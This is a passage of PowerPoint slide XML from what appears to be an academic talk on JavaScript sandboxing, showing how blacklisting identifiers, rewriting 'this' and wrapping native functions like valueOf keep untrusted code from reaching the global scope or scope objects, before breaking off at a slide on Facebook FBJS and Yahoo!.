              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Our solutions can rely on blacklisting.</a:t>
            </a:r>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33</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z="3400"/>
              <a:t>J(B)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" baseline="-25000"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400"/>
              <a:t>: a subset isolating the global scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Enforcement mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Start from J(B). Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and native functions returning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Rewrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(this==$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Global?null,this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Initialize an auxiliary (blacklisted) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>variable  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$Global=window; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Theorem: J(B)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> prevents access to the identifiers in B, and no term can be evaluated to the global scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Also works for browser implementations, adapting B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Benefits of isolating the global scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Can statically filter out the global variables that need to be protected, excluding them from the runtime blacklist in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>IDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Multiple applications can coexist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>only global variables need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>disjoint). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>provided implicit access is not a problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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34</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3400"/>
              <a:t>J(B)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" baseline="-25000"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400"/>
              <a:t>: a subset isolating all scope objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Enforcement mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Start from J(B). Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and native functions returning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Rewrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.$Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=false,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   $Scope?(delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.$Scope,this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		   (delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.$Scope,$Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>true,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Initialize an auxiliary (blacklisted) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$Scope=true; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Theorem: J(B)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> prevents access to the identifiers in B, and no term can be evaluated to a scope object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Works for Firefox and Internet Explorer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Benefits of isolating scope objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The semantics of applications is preserved by renaming of variables (if certain global variables are not renamed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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35</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l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>  Improving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>our solutions by wrapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>No need to blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We can wrap them as follows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>OPvalueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype.valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype.valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		function(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> $=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>OPvalueOf.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(this); 		     return ($==$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Global?null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>:$)}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Also this variant is provably correct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Wrapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>possible in principle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Concluding, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is the only serious restriction we need to impose on user JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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36</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685800" y="2614613"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FBJS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yahoo! </a:t>
            </a:r>
            <a:r>
